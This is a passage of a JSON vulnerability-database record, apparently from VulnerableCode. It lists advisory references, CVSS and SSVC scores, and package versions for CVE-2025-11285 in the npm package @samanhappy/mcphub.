,"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-11285"},{"reference_url":"https://github.com/advisories/GHSA-5q2p-3jg8-2m98","reference_id":"GHSA-5q2p-3jg8-2m98","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5q2p-3jg8-2m98"},{"reference_url":"https://vuldb.com/?id.327043","reference_id":"?id.327043","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"6.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-07T14:02:41Z/"}],"url":"https://vuldb.com/?id.327043"},{"reference_url":"https://vuldb.com/?submit.659734","reference_id":"?submit.659734","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"6.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-07T14:02:41Z/"}],"url":"https://vuldb.com/?submit.659734"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/861875?format=json","purl":"pkg:npm/%40samanhappy/mcphub@0.9.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cmx-144n-mucv"},{"vulnerability":"VCID-ctc9-v5xx-dfg7"},{"vulnerability":"VCID-dnq5-b1xm-7kh2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.11"}],"aliases":["CVE-2025-11285","GHSA-5q2p-3jg8-2m98"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yvc7-97ny-wkgy"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.23"}